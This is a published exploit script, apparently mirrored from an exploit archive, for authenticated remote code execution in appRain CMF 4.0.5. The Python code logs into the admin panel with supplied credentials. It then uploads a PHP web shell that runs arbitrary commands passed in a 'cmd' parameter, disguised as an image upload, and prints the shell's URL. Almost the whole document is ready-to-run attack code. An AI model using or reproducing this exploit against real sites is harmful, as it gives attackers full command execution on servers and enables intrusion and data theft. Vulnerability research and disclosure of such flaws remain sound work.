Share
## https://sploitus.com/exploit?id=PACKETSTORM:178895
# Exploit Title: appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated)  
# Date: 04/28/2024  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor Homepage: https://www.apprain.org  
# Software Link:  
https://github.com/apprain/apprain/archive/refs/tags/v4.0.5.zip  
# Version: latest  
# Tested on: MacOS  
  
import requests  
import sys  
import time  
import random  
import string  
  
def generate_filename():  
""" Generate a 5-character random string for filename. """  
return ''.join(random.choices(string.ascii_lowercase, k=5)) + ".inc"  
  
def login(site, username, password):  
print("Logging in...")  
time.sleep(2)  
login_url = f"https://{site}/admin/system"  
session = requests.Session()  
login_data = {  
'data[Admin][admin_id]': username,  
'data[Admin][admin_password]': password  
}  
headers = {  
'Content-Type': 'application/x-www-form-urlencoded'  
}  
response = session.post(login_url, data=login_data, headers=headers)  
if "Logout" in response.text:  
print("Login Successful!")  
return session  
else:  
print("Login Failed!")  
sys.exit()  
  
def upload_shell(session, site):  
print("Shell preparing...")  
time.sleep(2)  
filename = generate_filename()  
upload_url = f"https://{site}/admin/filemanager/upload"  
files = {  
'data[filemanager][image]': (filename, "<html><body><form method='GET'  
name='<?php echo basename($_SERVER['PHP_SELF']); ?>'><input type='TEXT'  
name='cmd' autofocus id='cmd' size='80'><input type='SUBMIT'  
value='Execute'></form><pre><?php if(isset($_GET['cmd'])){  
system($_GET['cmd']); } ?></pre></body></html>", 'image/jpeg')  
}  
data = {  
'submit': 'Upload'  
}  
response = session.post(upload_url, files=files, data=data)  
if response.status_code == 200 and "uploaded successfully" in response.text:  
print(f"Your Shell is Ready: https://{site}/uploads/filemanager/{filename}")  
else:  
print("Exploit Failed!")  
sys.exit()  
  
if __name__ == "__main__":  
print("Exploiting...")  
time.sleep(2)  
if len(sys.argv) != 4:  
print("Usage: python exploit.py sitename.com username password")  
sys.exit()  
site = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
session = login(site, username, password)  
upload_shell(session, site)